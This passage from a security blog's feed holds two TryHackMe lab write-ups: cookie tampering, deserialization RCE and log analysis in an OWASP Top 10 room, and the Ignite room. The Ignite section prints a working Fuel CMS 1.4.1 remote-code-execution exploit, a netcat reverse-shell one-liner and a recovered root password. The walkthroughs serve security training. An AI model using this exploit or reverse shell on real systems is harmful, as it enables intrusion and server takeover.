<p><img decoding="async" loading="lazy" class="size-full wp-image-34835 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_t6Hfq9McMutemExQlsyI3w.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 29" width="525" height="124" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_t6Hfq9McMutemExQlsyI3w.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_t6Hfq9McMutemExQlsyI3w-300x71.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 32"/></p>
<h4 id="ftoc-kiem-tra-du-lieu-duoc-ma-hoa" class="ftwp-heading">Check Encrypted Data</h4>
<p>You will see here that there are both plaintext and base64 encoded cookies.  The first flag will be found in one of these cookies.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34836 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_MK8-Z7XHP1p3vgfGoUkmDg.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 30" width="525" height="353" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_MK8-Z7XHP1p3vgfGoUkmDg.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_MK8-Z7XHP1p3vgfGoUkmDg-300x202.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 33"/></p>
<p><strong>Answer:</strong> THM{good_old_base64_huh}</p>
<h4 id="ftoc-sua-doi-gia-tri-cookie" class="ftwp-heading">Modify cookie value</h4>
<p>Notice here that you have a cookie named “userType”.  You are now a user, as confirmed by your information on the “myprofile” page.</p>
<p>This application defines what you can and cannot see by your userType.  What if you want to be an administrator?</p>
<p>Double left click on the “Value” column of “userType” to modify the content.  Let&#8217;s change our userType to &#8220;admin&#8221; and navigate to http://10.10.83.1/admin to get the second flag.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34837 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_IzyUyY0UlbXr9QDqjUxlkA.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] thirty first" width="525" height="215" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_IzyUyY0UlbXr9QDqjUxlkA.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_IzyUyY0UlbXr9QDqjUxlkA-300x123.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 34"/></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34838 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_HMlS5RidzVvaughfWQUfEQ.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 32" width="525" height="344" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_HMlS5RidzVvaughfWQUfEQ.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_HMlS5RidzVvaughfWQUfEQ-300x197.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 35"/></p>
<p><strong>Answer:</strong> THM{heres_the_admin_flag}</p>
<h3 id="ftoc-nhiem-vu-26-muc-do-nghiem-trong-8-insecure-deserialization-code-execution" class="ftwp-heading"><strong>Mission 26: [Mức độ nghiêm trọng 8]</strong> <strong class="ic fw">Insecure Deserialization — Code Execution</strong></h3>
<p>1. First, change the value of the userType cookie from “admin” to “user” and back to http://10.10.83.1/myprofile.</p>
<p>2. Then left click on the URL under “Exhange your vim” in the screenshot below.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34839 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_EEYwgX5BHZUMzI6K0iPDhA.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 33" width="525" height="284" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_EEYwgX5BHZUMzI6K0iPDhA.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_EEYwgX5BHZUMzI6K0iPDhA-300x162.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 36"/></p>
<p>3. Next left click on the URL under “Provide your feedback!”  to a page like this:</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34840 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_pwtT5NXo0ugwOq6CAT_SNA.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 34" width="525" height="269" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_pwtT5NXo0ugwOq6CAT_SNA.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_pwtT5NXo0ugwOq6CAT_SNA-300x154.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 37"/></p>
<h4 id="ftoc-1-flag-txt" class="ftwp-heading">#1 flag.txt</h4>
<p>Change netcat ip.</p>
<p>Use command <code>nano rce.py</code></p>
<p>Swap tryhackmyIP to the IP of that website.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34841 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_9V77__vCew4fh1DYX3Hr7A.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 35" width="700" height="236" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_9V77__vCew4fh1DYX3Hr7A.jpg 700w, https://anonyviet.com/wp-content/uploads/2021/10/1_9V77__vCew4fh1DYX3Hr7A-300x101.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 38"/> <img decoding="async" loading="lazy" class="size-full wp-image-34842 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_x8U0Kc3WlmklPKiKMOwUJQ.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 36" width="700" height="68" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_x8U0Kc3WlmklPKiKMOwUJQ.jpg 700w, https://anonyviet.com/wp-content/uploads/2021/10/1_x8U0Kc3WlmklPKiKMOwUJQ-300x29.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 39"/></p>
<p>Paste this into the “encodedPayload” cookie in your browser:</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34843 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_T1K36ev-PGuhao2xzC3J9Q.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 37" width="525" height="266" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_T1K36ev-PGuhao2xzC3J9Q.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_T1K36ev-PGuhao2xzC3J9Q-300x152.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 40"/></p>
<p>7. Make sure netcat is still running:</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34844 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_J0JZqUTMtFxWA0JwhlyrJw.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 38" width="700" height="187" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_J0JZqUTMtFxWA0JwhlyrJw.jpg 700w, https://anonyviet.com/wp-content/uploads/2021/10/1_J0JZqUTMtFxWA0JwhlyrJw-300x80.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 41"/></p>
<p>8. Refresh the page.  It will hang, go back to netcat:</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34845 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_-dFodSJWPDeLQjPcXgYetg.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 39" width="648" height="185" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_-dFodSJWPDeLQjPcXgYetg.jpg 648w, https://anonyviet.com/wp-content/uploads/2021/10/1_-dFodSJWPDeLQjPcXgYetg-300x86.jpg 300w" sizes="auto, (max-width: 648px) 100vw, 648px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 42"/></p>
<p><strong>Answer:</strong> 4a69a7ff9fd68</p>
<h3 id="ftoc-nhiem-vu-29-muc-do-nghiem-trong-9-components-with-known-vulnerabilities-lab" class="ftwp-heading"><strong>Mission 29: [Mức độ nghiêm trọng 9]</strong> <strong class="ic fw">Components With Known Vulnerabilities — Lab</strong></h3>
<h4 id="ftoc-1-co-bao-nhieu-ky-tu-trong-etc-passwd-su-dung-wc-c-etc-passwd-de-co-cau-tra-loi" class="ftwp-heading">#1 How many characters are in /etc/passwd (using <strong class="ic fw">WC </strong>-c /etc/passwd for the answer)</h4>
<p>Visit the website, as we see this is a normal book website.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34846 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_TRi9V-3tW6L0zf2x8Fccow.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 40" width="525" height="373" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_TRi9V-3tW6L0zf2x8Fccow.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_TRi9V-3tW6L0zf2x8Fccow-300x213.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/10/1_TRi9V-3tW6L0zf2x8Fccow-120x86.jpg 120w, https://anonyviet.com/wp-content/uploads/2021/10/1_TRi9V-3tW6L0zf2x8Fccow-350x250.jpg 350w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 43"/></p>
<p>Did a bit of research on vulnerabilities found in online bookstore sites and I found this.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34847 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_A3V1TD8v0bAzwBYZDlqmXg.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 41" width="525" height="293" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_A3V1TD8v0bAzwBYZDlqmXg.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_A3V1TD8v0bAzwBYZDlqmXg-300x167.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 44"/></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34848 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_-ced-BSJK0y-7FcZAbzFdw.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 42" width="656" height="198" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_-ced-BSJK0y-7FcZAbzFdw.jpg 656w, https://anonyviet.com/wp-content/uploads/2021/10/1_-ced-BSJK0y-7FcZAbzFdw-300x91.jpg 300w" sizes="auto, (max-width: 656px) 100vw, 656px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 45"/></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34849 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_B4p4BKvh7jglZ4HLdmKZTA.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 43" width="662" height="99" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_B4p4BKvh7jglZ4HLdmKZTA.jpg 662w, https://anonyviet.com/wp-content/uploads/2021/10/1_B4p4BKvh7jglZ4HLdmKZTA-300x45.jpg 300w" sizes="auto, (max-width: 662px) 100vw, 662px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] forty six"/></p>
<p><strong>Answer:</strong> 1611</p>
<h3 id="ftoc-nhiem-vu-30-muc-do-nghiem-trong-10-insufficient-logging-monitoring" class="ftwp-heading"><strong>Mission 30: [Mức độ nghiêm trọng 10] Insufficient Logging &#038; Monitoring</strong></h3>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34850 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_kC5SlBCSDe1D0cPpCs48-Q.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 44" width="525" height="142" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_kC5SlBCSDe1D0cPpCs48-Q.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_kC5SlBCSDe1D0cPpCs48-Q-300x81.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 47"/></p>
<p>We have to download the login-logs.txt file.  Click download and save the file.</p>
<h4 id="ftoc-1-ke-tan-cong-dang-su-dung-dia-chi-ip-nao" class="ftwp-heading">#1 What IP address is the attacker using?</h4>
<p>We can use cat login-logs.txt and see all the frontends.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34851 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_cEGS52wUfC0ra_Xo33FI1w.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 45" width="652" height="219" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_cEGS52wUfC0ra_Xo33FI1w.jpg 652w, https://anonyviet.com/wp-content/uploads/2021/10/1_cEGS52wUfC0ra_Xo33FI1w-300x101.jpg 300w" sizes="auto, (max-width: 652px) 100vw, 652px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 48"/></p>
<p>There is one person constantly accessing the system with different usernames.</p>
<p><strong>Answer:</strong> 49.99.13.16</p>
<h4 id="ftoc-2-loai-tan-cong-nao-dang-duoc-thuc-hien" class="ftwp-heading">#2 What kind of attack is being performed?</h4>
<p>HTTP 401 indicates that the request has not been applied because it lacks valid credentials for the target resource.</p>
<p>So I think it&#8217;s a brute force attack because we see that someone is repeatedly trying a password with a different username.</p>
<p><strong>Answer:</strong> Brute Force</p>
<p>So this series is done.  Are you looking forward to other series?  In addition, you can also see more challenges on tryhackme <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Ftag%2Ftryhackme%2F" rel="noopener" class="local-link">here</a>.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;34822&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/tryhackme-owasp-top-10-challenge-phan-3/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/10/1_TPtoIN4c4bLgS8fCGCU8Wg.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>A little Writeup about the Ignite challenge</title>
		<link>https://en.anonyviet.com/a-little-writeup-about-the-ignite-challenge/</link>
					<comments>https://en.anonyviet.com/a-little-writeup-about-the-ignite-challenge/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 10 Jan 2023 08:35:18 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[challenge]]></category>
		<category><![CDATA[Ignite]]></category>
		<category><![CDATA[Writeup]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=894</guid>

					<description><![CDATA[Continue the series of writing up interesting challenges on Tryhackme. The challenge this time I writeup with you is Ignite. Join the channel Telegram of the AnonyViet 👉 Link 👈 A little Writeup about the Ignite challenge Nmap We can see two ports in the nmap scan but only port 80 is open, the other [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p>Continue the series of writing up interesting challenges on Tryhackme.  The challenge this time I writeup with you is <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Ftryhackme.com%2Froom%2Fignite" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Ignite</a>.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img post-id="894" fifu-featured="1" decoding="async" class="aligncenter wp-image-34144 size-full" src="https://anonyviet.com/wp-content/uploads/2021/09/campfire.jpg" alt="A little Writeup about the Ignite challenge" title="A little Writeup about the Ignite challenge" width="750" height="563" srcset="https://anonyviet.com/wp-content/uploads/2021/09/campfire.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/09/campfire-300x225.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" title="A little Writeup about the Ignite challenge 17"/></p>
<h2 id="ftoc-mot-chut-writeup-ve-thu-thach-ignite" class="ftwp-heading">A little Writeup about the Ignite challenge</h2>
<h3 id="ftoc-nmap" class="ftwp-heading">Nmap</h3>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34147 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/nmap-2.jpg" alt="A little Writeup about the Ignite 15 . challenge" width="758" height="221" srcset="https://anonyviet.com/wp-content/uploads/2021/09/nmap-2.jpg 758w, https://anonyviet.com/wp-content/uploads/2021/09/nmap-2-300x87.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/nmap-2-750x219.jpg 750w" sizes="auto, (max-width: 758px) 100vw, 758px" title="A little Writeup about the Ignite 18 challenge"/></p>
<p>We can see two ports in the nmap scan but only port 80 is open, the other port is filtered so we can ignore it.  Discover what port 80 has.</p>
<h3 id="ftoc-http" class="ftwp-heading">HTTP</h3>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34150 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/website-2.jpg" alt="A little Writeup about Ignite 16 . challenge" width="797" height="623" srcset="https://anonyviet.com/wp-content/uploads/2021/09/website-2.jpg 797w, https://anonyviet.com/wp-content/uploads/2021/09/website-2-300x235.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/website-2-768x600.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/09/website-2-750x586.jpg 750w" sizes="auto, (max-width: 797px) 100vw, 797px" title="A little Writeup about the Ignite 19 challenge"/></p>
<p>I think this is a new kind of CMS system because I have never seen it used in any other vulnerable system.</p>
<p>During the nmap scan, we can see that file <code>robots.txt</code> there are several data entries.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34151 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/robots-1.png" alt="A little Writeup about the Ignite challenge 17" width="484" height="284" srcset="https://anonyviet.com/wp-content/uploads/2021/09/robots-1.png 484w, https://anonyviet.com/wp-content/uploads/2021/09/robots-1-300x176.png 300w" sizes="auto, (max-width: 484px) 100vw, 484px" title="A little Writeup about the Ignite 20 . challenge"/></p>
<p>When I try to access <code>/fuel</code>then I found this login screen.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34152 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/login-1.png" alt="A little Writeup about the Ignite 18 challenge" width="486" height="490" srcset="https://anonyviet.com/wp-content/uploads/2021/09/login-1.png 486w, https://anonyviet.com/wp-content/uploads/2021/09/login-1-298x300.png 298w, https://anonyviet.com/wp-content/uploads/2021/09/login-1-150x150.png 150w, https://anonyviet.com/wp-content/uploads/2021/09/login-1-75x75.png 75w" sizes="auto, (max-width: 486px) 100vw, 486px" title="A little Writeup about the Ignite 21 challenge"/></p>
<p>Since we don&#8217;t have any credentials we can&#8217;t log into the site, so we&#8217;ll need to find some workaround.</p>
<p>What comes to mind is is that the default login?  And I was right, the login is<code> admin:admin</code>but I found out I don&#8217;t need them.</p>
<p>Just change the plan, I&#8217;m looking for information about <code>fuel</code> above <code>searchsploit</code> and found the RCE for the version <code>1.4.1</code></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34153 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/searchsploit.png" alt="A little Writeup about the Ignite 19 challenge" width="1920" height="130" srcset="https://anonyviet.com/wp-content/uploads/2021/09/searchsploit.png 1920w, https://anonyviet.com/wp-content/uploads/2021/09/searchsploit-300x20.png 300w, https://anonyviet.com/wp-content/uploads/2021/09/searchsploit-1024x69.png 1024w, https://anonyviet.com/wp-content/uploads/2021/09/searchsploit-768x52.png 768w, https://anonyviet.com/wp-content/uploads/2021/09/searchsploit-1536x104.png 1536w, https://anonyviet.com/wp-content/uploads/2021/09/searchsploit-750x51.png 750w, https://anonyviet.com/wp-content/uploads/2021/09/searchsploit-1140x77.png 1140w" sizes="auto, (max-width: 1920px) 100vw, 1920px" title="A little Writeup about the Ignite 22 . challenge"/></p>
<p>Next is to download the exploit and change line 14 to URL = “http://10.0.0.130/” ie IP of the machine.</p>
<p>Here is the exploit:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">import requests&#13;
import urllib&#13;
&#13;
URL = "http://10.0.0.130/"&#13;
&#13;
&#13;
def find_nth_overlapping(haystack, needle, n):&#13;
    start = haystack.find(needle)&#13;
    while start &gt;= 0 and n &gt; 1:&#13;
        start = haystack.find(needle, start+1)&#13;
        n -= 1&#13;
    return start&#13;
&#13;
&#13;
while 1:&#13;
    xxxx = input('cmd:')&#13;
    url = URL+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"&#13;
    r = requests.get(url)&#13;
&#13;
    html = "&lt;!DOCTYPE html&gt;"&#13;
    htmlcharset = r.text.find(html)&#13;
&#13;
    begin = r.text[0:20]&#13;
    dup = find_nth_overlapping(r.text,begin,2)&#13;
&#13;
    print(r.text[0:dup])</pre>
<p>Run the exploit and enter the input.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34158 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/rce.jpg" alt="A little Writeup about the Ignite 20 . challenge" width="593" height="321" srcset="https://anonyviet.com/wp-content/uploads/2021/09/rce.jpg 593w, https://anonyviet.com/wp-content/uploads/2021/09/rce-300x162.jpg 300w" sizes="auto, (max-width: 593px) 100vw, 593px" title="A little Writeup about the Ignite challenge 23"/></p>
</p>
<p>NOTE: Make sure the input command is in “” ie when you run the exploit you will have to enter the command you want to execute.  Example: Suppose you want to run ls then you must type cmd: “ls” and not cmd: ls.  Note that the command must be enclosed in quotation marks.</p>
<p>Since we already know RCE, it is easy to get everse shell.  Run the following command to get the reverse shell:</p>
<pre><code>cmd:"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.56.1 4444 &gt;/tmp/f"</code></pre>
<p>This command will give you a reverse shell on your listener that will listen on port 4444 via nc -nlvp 4444</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34155 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/reverse-shell-1.png" alt="A little Writeup about the Ignite 21 challenge" width="555" height="174" srcset="https://anonyviet.com/wp-content/uploads/2021/09/reverse-shell-1.png 555w, https://anonyviet.com/wp-content/uploads/2021/09/reverse-shell-1-300x94.png 300w" sizes="auto, (max-width: 555px) 100vw, 555px" title="A little Writeup about Ignite 24 challenge"/></p>
<p>Now we can get the flag from the home directory.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34156 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/user-1.png" alt="A little Writeup about the Ignite 22 . challenge" width="337" height="190" srcset="https://anonyviet.com/wp-content/uploads/2021/09/user-1.png 337w, https://anonyviet.com/wp-content/uploads/2021/09/user-1-300x169.png 300w" sizes="auto, (max-width: 337px) 100vw, 337px" title="A little Writeup about the Ignite 25 . challenge"/></p>
<h3 id="ftoc-leo-thang-dac-quyen" class="ftwp-heading">Escalation of privileges</h3>
<p>Since we&#8217;re on the victim machine, let&#8217;s try running the enum command to see if we can find anything.  You can use the word wget to load the enum file from your system onto the machine.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34145 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/enum.png" alt="A little Writeup about the Ignite challenge 23" width="805" height="260" srcset="https://anonyviet.com/wp-content/uploads/2021/09/enum.png 805w, https://anonyviet.com/wp-content/uploads/2021/09/enum-300x97.png 300w, https://anonyviet.com/wp-content/uploads/2021/09/enum-768x248.png 768w, https://anonyviet.com/wp-content/uploads/2021/09/enum-750x242.png 750w" sizes="auto, (max-width: 805px) 100vw, 805px" title="A little Writeup about the Ignite challenge 26"/></p>
<p>After searching for a while, I found the root password at: <code>/var/www/html/fuel/application/config/database.php</code></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34157 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/password.jpg" alt="A little Writeup about Ignite 24 challenge" width="464" height="445" srcset="https://anonyviet.com/wp-content/uploads/2021/09/password.jpg 464w, https://anonyviet.com/wp-content/uploads/2021/09/password-300x288.jpg 300w" sizes="auto, (max-width: 464px) 100vw, 464px" title="A little Writeup about the Ignite challenge 27"/></p>
<p>root: <code>mememe</code></p>
<p>Okay we just found the password for the root user and now we can change our account to <code>root</code> by command <code>su</code>.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34159 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/root-shell-1.png" alt="A little Writeup about the Ignite 25 . challenge" width="610" height="158" srcset="https://anonyviet.com/wp-content/uploads/2021/09/root-shell-1.png 610w, https://anonyviet.com/wp-content/uploads/2021/09/root-shell-1-300x78.png 300w" sizes="auto, (max-width: 610px) 100vw, 610px" title="A little Writeup about Ignite 28 . challenge"/></p>
<p>Then you just get the root flag from <code>/root</code>.</p>
<h2 id="ftoc-tong-ket" class="ftwp-heading">summary</h2>
<p>Ignite is a pretty good challenge for beginners from @Darkstar and @lollava.  If you are a beginner then I recommend you to play the Ignite challenge.</p>
<p>Alternatively, you can also solve Shodan.io on Tryhackme<a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fhuong-dan-giai-bai-ve-shodan-io-tren-tryhackme%2F" rel="noopener" class="local-link"> here.</a></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;34143&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/a-little-writeup-about-the-ignite-challenge/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/09/campfire.jpg" medium="image"></media:content>
            	</item>
	</channel>
</rss>
